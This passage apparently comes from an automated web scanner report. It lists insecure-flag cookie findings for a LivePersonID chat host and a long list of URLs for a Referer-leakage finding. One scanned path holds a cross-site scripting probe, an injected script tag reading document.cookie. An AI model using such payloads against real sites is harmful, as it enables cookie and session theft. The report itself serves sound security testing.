Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

16.2. https://base.liveperson.net/hc/5296924/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://base.liveperson.net
Path:	/hc/5296924/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

LPit=false; path=/hc/5296924
HumanClickSiteContainerID_5296924=Master; path=/hc/5296924
LivePersonID=-16101423669632-1296223154:1296223611:-1:-1:-1; expires=Sat, 28-Jan-2012 14:06:54 GMT; path=/hc/5296924; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.3. https://base.liveperson.net/hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://base.liveperson.net
Path:	/hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

LivePersonID=-16101423669632-1296227119:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 15:05:19 GMT; path=/hc/5296924; domain=.liveperson.net
HumanClickKEY=8955939450992135978; path=/hc/5296924
HumanClickSiteContainerID_5296924=Master; path=/hc/5296924
LivePersonID=-16101423669632-1296227119:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 15:05:19 GMT; path=/hc/5296924; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17. Cross-domain Referer leakage previous next
There are 329 instances of this issue:

http://a.tribalfusion.com/j.ad
http://a.tribalfusion.com/j.ad
http://ad.afy11.net/ad
http://ad.afy11.net/ad
http://ad.afy11.net/ad
http://ad.doubleclick.net/adi/N3093.130430.MINDSETMEDIA/B4053191
http://ad.doubleclick.net/adi/N3093.130430.MINDSETMEDIA/B4053191
http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2
http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048
http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048
http://ad.doubleclick.net/adi/N3740.TribalFusion.com/B5132291.17
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2
http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2
http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.5
http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6
http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.7
http://ad.doubleclick.net/adi/N4319.msn/B2087123.382
http://ad.doubleclick.net/adi/N4682.132309.BURSTMEDIA/B4421704.7
http://ad.doubleclick.net/adi/N4682.132309.BURSTMEDIA/B4421704.7
http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4
http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5
http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17
http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17
http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.3
http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.3
http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5
http://ad.doubleclick.net/adj/N3340.trfu/B4677841.19
http://ad.doubleclick.net/adj/N3340.trfu/B4677841.19
http://ad.doubleclick.net/adj/N3340.trfu/B4938104.54
http://ad.doubleclick.net/adj/N3340.trfu/B4938104.54
http://ad.doubleclick.net/adj/N3340.trfu/B5083632.138
http://ad.doubleclick.net/adj/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6
http://ad.doubleclick.net/adj/N4506.interclick.com/B5098486.2
http://ad.doubleclick.net/adj/N4506.interclick.com/B5098486.2
http://ad.doubleclick.net/adj/N4610.270478.AOLADVERTISINGADVER/B5087810.46
http://ad.doubleclick.net/adj/N6103.135388.BIZO/B5185769.6
http://ad.doubleclick.net/adj/N6103.135388.BIZO/B5185769.6
http://ad.doubleclick.net/adj/cm.rev_bostonherald/
http://ad.doubleclick.net/adj/cm.rev_bostonherald/
http://ad.doubleclick.net/adj/cm.rev_bostonherald/
http://ad.doubleclick.net/adj/cm.rev_bostonherald/
http://ad.doubleclick.net/adj/cm.rev_bostonherald/
http://ad.doubleclick.net/adj/cm.rev_bostonherald/
http://ad.doubleclick.net/adj/cm.rev_bostonherald/
http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/classified
http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/entertainment
http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/entertainment/events
http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/weather
http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/ads.js
http://ads.bluelithium.com/st
http://ads.roiserver.com/disp
http://adsfac.us/link.asp
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10465427522@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10582313713@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12477363337@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12831563331@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/13251816646@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14171843173@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15457540452@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15741228112@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/18360874151@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/15284078472@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17127515176@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90
http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90
http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90
http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90
http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90
http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90
http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90
https://base.liveperson.net/hc/5296924/
http://bh.heraldinteractive.com/includes/processAds.bg
http://bh.heraldinteractive.com/includes/processAds.bg
http://bh.heraldinteractive.com/includes/processAds.bg
http://bh.heraldinteractive.com/includes/processAds.bg
http://bh.heraldinteractive.com/includes/processAds.bg
http://boston30.autochooser.com/results.asp
http://bostonherald.com/blogs/entertainment/the_assistant/
http://bostonherald.com/blogs/lifestyle/fork_lift/
http://bostonherald.com/news/document.bg
http://bostonherald.com/projects/your_tax_dollars.bg
http://bostonherald.com/search/
http://bostonherald.com/search/
http://bostonherald.com/sports/football/patriots/view.bg
http://bostonherald.com/track/inside_track/
http://bostonherald.com/track/inside_track/view.bg
http://bostonherald.com/track/inside_track/view.bg
http://bostonherald.com/track/inside_track/view.bg
http://bostonherald.com/track/star_tracks/
http://bostonherald.com/track/star_tracks/view.bg
http://bostonherald.com/track/star_tracks/view.bg
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js
http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js
http://common.onset.freedom.com/fi/adsense/
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js
http://digg.com/submit
http://events.cbs6albany.com/
http://events.cbs6albany.com/
http://events.cbs6albany.com/search
http://events.cbs6albany.com/user/login
http://events.cbs6albany.com/user/signup
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html
http://ib.adnxs.com/ab
http://ib.adnxs.com/ptj
http://jqueryui.com/themeroller/
http://local.nissanusa.com/zip.aspx
http://network.realmedia.com/3/bostonherald/ros/728x90/jx/ss/a/L31@Top1
http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670
http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670
http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670
http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247919265/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/126580716/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/133886311/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1381389243/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1410609386/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1443540246/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1462172569/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663408298/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/167914676/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790696998/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2021312465/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2141444174/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/328960883/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/572126538/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/589036194/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/672313137/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/677208420/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/788685001/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/90261661/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c
http://oascentral.bostonherald.com/RealMedia/ads/adstream_mjx.ads/www.carfind.com/1222741686@Top1,Right1,Right2,Right3
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/1304732975/Position1/BostonHerald/JobfindFeatured/MJMConstructionCorp.html/72634857383031444f386b4144567663
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/2007038988/x15/BostonHerald/HerbChambers_234x60/herbChambers234x60a.gif/72634857383031444f386741434e6f35
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/49256996/x16/BostonHerald/BooCoo_234x60/boocoo_BlueWhite_234x60.jpg/72634857383031444f386741434e6f35
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/855079761/Position2/BostonHerald/JobfindFeatured/EverettNursing.html/72634857383031444f386b4144567663
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1217332109/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1258879011/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/178441265/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1852599113/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2058755968/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2124335020/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/371110779/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/395221226/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663
http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663
http://pixel.invitemedia.com/rubicon_sync
http://pixel.invitemedia.com/rubicon_sync
http://scores.heraldinteractive.com/merge/tsnform.aspx
http://smm.sitescout.com/disp
http://smm.sitescout.com/disp
http://tag.contextweb.com/TAGPUBLISH/getad.aspx
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt
http://twitter.com/
http://twitter.com/malsup
http://twitter.com/malsup
http://twitter.com/search
http://twitter.com/search
http://twitter.com/search
http://twitter.com/share
http://www.addthis.com/bookmark.php
http://www.berkshireeagle.com/portlet/weather/html/process_mode.jsp
http://www.bostonherald.com/
http://www.bostonherald.com/blogs/sports/rap_sheet/
http://www.bostonherald.com/business/
http://www.bostonherald.com/business/general/
http://www.bostonherald.com/business/general/view.bg
http://www.bostonherald.com/entertainment/
http://www.bostonherald.com/entertainment/movies/reviews/view.bg
http://www.bostonherald.com/galleries/index.php
http://www.bostonherald.com/homepage.bg
http://www.bostonherald.com/index.bg
http://www.bostonherald.com/jobfind/
http://www.bostonherald.com/mediacenter/index.php
http://www.bostonherald.com/mediacenter/video.php
http://www.bostonherald.com/mediacenter/video.php
http://www.bostonherald.com/news/
http://www.bostonherald.com/news/columnists/
http://www.bostonherald.com/news/columnists/view.bg
http://www.bostonherald.com/news/international/africa/view.bg
http://www.bostonherald.com/news/national/general/view.bg
http://www.bostonherald.com/news/offbeat/
http://www.bostonherald.com/news/politics/
http://www.bostonherald.com/news/politics/view.bg
http://www.bostonherald.com/news/politics/view.bg
http://www.bostonherald.com/news/politics/view.bg
http://www.bostonherald.com/news/regional/
http://www.bostonherald.com/news/regional/view.bg
http://www.bostonherald.com/news/regional/view.bg
http://www.bostonherald.com/news/regional/view.bg
http://www.bostonherald.com/news/regional/view.bg
http://www.bostonherald.com/photobox/index.bg
http://www.bostonherald.com/projects/mcas2009
http://www.bostonherald.com/projects/your_tax_dollars.bg
http://www.bostonherald.com/search/
http://www.bostonherald.com/search/
http://www.bostonherald.com/search/
http://www.bostonherald.com/search/
http://www.bostonherald.com/search/
http://www.bostonherald.com/sports/football/patriots/view.bg
http://www.bostonherald.com/sports/football/patriots/view.bg
http://www.bostonherald.com/track/
http://www.bostonherald.com/track/celebrity/
http://www.bostonherald.com/track/celebrity/view.bg
http://www.bostonherald.com/track/inside_track/
http://www.bostonherald.com/track/inside_track/view.bg
http://www.bostonherald.com/track/star_tracks/
http://www.bostonherald.com/track/star_tracks/view.bg
http://www.bostonherald.com/users/register
http://www.cbs6albany.com/common/archives/
http://www.cbs6albany.com/common/archives/
http://www.cbs6albany.com/common/tools/load.php
http://www.cbs6albany.com/sections/thirdParty/iframe_header/
http://www.moxiesoft.com/search.aspx
http://www.moxiesoft.com/tal_lp/campaign.aspx
http://www.moxiesoft.com/tal_lp/default.aspx
http://www.moxiesoft.com/tal_news/press_release.aspx
http://www.moxiesoft.com/tal_news/webinars/default.aspx
http://www.moxiesoft.com/tal_products/chat.aspx
http://www.moxiesoft.com/tal_products/chat_tour2.aspx
http://www.moxiesoft.com/tal_resources/content.aspx
https://www.paperg.com/post.php
http://www.soundingsonline.com/component/chronocontact/
http://www.soundingsonline.com/index.php
http://www.soundingsonline.com/index.php
